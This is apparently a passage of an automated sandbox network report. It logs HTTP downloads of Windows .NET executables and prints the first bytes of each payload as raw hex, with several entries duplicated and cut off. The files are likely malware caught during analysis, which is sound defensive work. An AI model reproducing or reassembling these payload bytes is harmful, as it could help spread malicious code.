00 00 06 2b 00 2a 22 28 04 01 00 06 2b 00 2a 26 28 39 01 00 06 26 2b 00 2a ee 2b 35 73 6b 00 00 0a 20 b8 0b 00 00 20 10 27 00 00 6f 6c 00 00 0a 28 2c 00 00 0a 7e 15 00 00 04 2d 0a 28 62 00 00 06 28 54 00 00 06 7e 1b 00 00 04 6f 6d 00 00 0a 26 17 2d c8 2a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 20:42:12 GMTContent-Type: application/octet-streamContent-Length: 1422336Last-Modified: Sat, 31 Aug 2024 20:06:58 GMTConnection: keep-aliveETag: "66d377e2-15b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 91 78 95 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a8 15 00 00 0a 00 00 00 00 00 00 ae c6 15 00 00 20 00 00 00 e0 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 16 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 c6 15 00 4b 00 00 00 00 e0 15 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 a6 15 00 00 20 00 00 00 a8 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 e0 15 00 00 08 00 00 00 aa 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 16 00 00 02 00 00 00 b2 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 c6 15 00 00 00 00 00 48 00 00 00 02 00 05 00 98 3e 15 00 c8 87 00 00 01 00 00 00 30 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 97 92 b4 3a fe b4 08 72 cd 10 ae 10 a2 65 19 bb 3c de 28 8e e3 e4 dd fc 16 cb 8d 5e 1d 61 25 57 43 45 b4 78 aa 92 83 81 a7 0d d6 68 44 22 86 d3 cf f6 36 86 de b0 01 c5 c2 a7 f4 f7 d6 51 e8 a6 b0 d2 67 1b 14 18 29 fe a9 ac 7e f6 ac d7 4a d0 07 e2 e0 bc 53 b0 c1 e9 32 9b 13 8e de 47 9d 39 59 25 09 ce e2 60 1f 61 c4 a5 67 31 4b 15 5a 9c 9c 32 7d f0 03 d7 94 bd 30 93 4a 93 82 c5 68 f9 00 00 00 00 00 00 00 3c 3b 80 ce d9 21 dc a5 bf ec 6d 0a 41 93 15 dc ec a4 4b bf 44 7c d1 fa 13 43 2d 49 50 28 b6 a4 d7 45 c8 76 d6 23 b6 61 24 10 54 a9 06 5d 7e 24 0c 2e 47 05 4d cc 15 2c 65 0b a0 99 df 17 0a 92 8b 84 6c 90 5c 50 22 64 23 b5 e5 c4 60 da 16 33 08 83 20 eb 8b d4 c8 a3 f5 cc de 8d 08 67 d7 ee ea 94 f2 05 ca d1 3b c1 17 5e 0b 6d ad 17 77 61 76 fd f1 df 45 0d 17 e4 2c 7e 98 67 5a 1b a7 fa 43 00 00 00 00 00 00 00 01 00 00 00 03 03 00 00 00 02 03 00 00 00 05 05 00 00 00 01 00 00 00 05 05 00 00 00 02 03 00 00 00 00 00 00 00 00 01 00 00 00 03 03
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 09 Aug 2024 00:59:07 GMTETag: "a5000-61f35a680ff51"Accept-Ranges: bytesContent-Length: 675840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 47 0a 00 00 20 00 00 00 48 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 05 00 00 00 80 0a 00 00 06 00 00 00 4a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 64 5b 0a 00 78 0c 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 df 23 47 89 01 64 0b df 50 c9 36 fe 3e f6 be 28 d6 1f 87 1e e6 3d 23 1e 14 55 2e d2 f4 52 69 0e fc 44 be c2 93 f2 08 00 94 0e 48 c1 78 9a 8e 37 d9 7a f8 29 56 16 3f 32 16 1b 74 f0 0a 73 91 ee ee e5 ab 41 2a 5d d0 8b c5 34 81 ec 72 49 30 20 50 82 f7 68 0e 73 dd 75 8b 01 e9 3b 50 ca a7 a4 a7 fb f5 ed 75 1d 8a c8 37 12 a3 9c ad 67 a3 fe 82 16 60 f2 bb 1f 1a 98 89 88 b4 b5 44 85 2e 61 ec 19 70 8f 14 f7 9c dc b3 f1 cf 6e 52 61 2b 35 d5 75 78 8c 2a 72 0d 07 0c cc 21 36 99 a7 ad 7d f5 cb 19 7b ad 8d c4 41 e1 36 f6 39 fb 14 2f 57 38 a9 87 27 d6 d3 a2 17 65 a2 cb d5 55 7c 89 78 2b 54 71 06 e4 92 e9 9f 37 2b 39 47 f8 74 9a b9 15 1c da 3d 94 bb 9f 4a 9f a4 c7 86 05 45 5b 17 13 5f 99 ac e0 89 af 4d 58 ad e1 ea 02 f3 21 40 39 1b bd 36 c0 5d ba b7 41 9a e1 c4 0a 09 74 7b bc 22 56 09 69 da f9 9f 25 b2 2e 2d d2 94 4c 64 24 8e 8b 07 eb 71 86 ed 8b ab 82 8f 08 2d db 9f 2a cd 78 19 62 d0 5e 7d 33 3a 63 5f de 44 d4 d3 96 6b 5e fd a4 99 a0 7e 19 34 38 41 dc 75 ed 52 f5 c6 64 63 ff 6c 80 99 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 08 Aug 2024 03:39:14 GMTETag: "17800-61f23c5420f4f"Accept-Ranges: bytesContent-Length: 96256Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 3d b4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 08 00 00 00 00 00 00 2e 8d 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 8c 01 00 4f 00 00 00 00 a0 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 6d 01 00 00 20 00 00 00 6e 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ce 04 00 00 00 a0 01 00 00 06 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8d 01 00 00 00 00 00 48 00 00 00 02 00 05 00 94 67 00 00 48 25 01 00 01 00 00 00 26 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 18 00 00 0a 2a 1a 72 01 00 00 70 2a 1a 20 8d 98 98 04 2a 1e 02 28 19 00 00 0a 2a 1a 72 43 00 00 70 2a a6 73 1a 00 00 0a 80 01 00 00 04 73 1b 00 00 0a 80 02 00 00 04 73 1c 00 00 0a 80 03 00 00 04 73 1d 00 00 0a 80 04 00 00 04 2a 1a 72 67 00 00 70 2a 1a 20 67 f6 68 05 2a 1a 72 cb 00 00 70 2a 1a 20 72 e2 f3 04 2a 1a 72 2f 01 00 70 2a 1a 20 f5 a1 be 01 2a 1a 72 93 01 00 70 2a 1a 20 2a 70 7b 01 2a 1a 72 f7 01 00 70 2a 1a 20 dc e2 3f 04 2a 1e 02 28 28 00 00 0a 2a 1a 72 89 05 00 70 2a 1a 20 f0 df bf 01 2a 1a 72 ed 05 00 70 2a 1a 20 53 08 dd 04 2a c2 28 2b 00 00 06 2d 07 28 2c 00 00 06 2c 02 2b 07 28 2d 00 00 06 2c 02 2b 07 28 2a 00 00 06 2c 02 2b 07 28 29 00 00 06 2c 06 14 28 5a 00 00 0a 2a 22 28 cb 00 00 06 2b 00 2a 22 28 04 01 00 06 2b 00 2a 26 28 39 01 00 06 26 2b 00 2a ee 2b 35 73 6b 00 00 0a 20 b8 0b 00 00 20 10 27 00 00 6f 6c 00 00 0a 28 2c 00 00 0a 7e 15 00 00 04 2d 0a 28 62 00 00 06 28 54 00 00 06 7e 1b 00 00 04 6f 6d 00 00 0a 26 17 2d c8 2a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 08 Aug 2024 03:39:14 GMTETag: "17800-61f23c5420f4f"Accept-Ranges: bytesContent-Length: 96256Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 3d b4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 08 00 00 00 00 00 00 2e 8d 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 8c 01 00 4f 00 00 00 00 a0 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 6d 01 00 00 20 00 00 00 6e 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ce 04 00 00 00 a0 01 00 00 06 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8d 01 00 00 00 00 00 48 00 00 00 02 00 05 00 94 67 00 00 48 25 01 00 01 00 00 00 26 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 18 00 00 0a 2a 1a 72 01 00 00 70 2a 1a 20 8d 98 98 04 2a 1e 02 28 19 00 00 0a 2a 1a 72 43 00 00 70 2a a6 73 1a 00 00 0a 80 01 00 00 04 73 1b 00 00 0a 80 02 00 00 04 73 1c 00 00 0a 80 03 00 00 04 73 1d 00 00 0a 80 04 00 00 04 2a 1a 72 67 00 00 70 2a 1a 20 67 f6 68 05 2a 1a 72 cb 00 00 70 2a 1a 20 72 e2 f3 04 2a 1a 72 2f 01 00 70 2a 1a 20 f5 a1 be 01 2a 1a 72 93 01 00 70 2a 1a 20 2a 70 7b 01 2a 1a 72 f7 01 00 70 2a 1a 20 dc e2 3f 04 2a 1e 02 28 28 00 00 0a 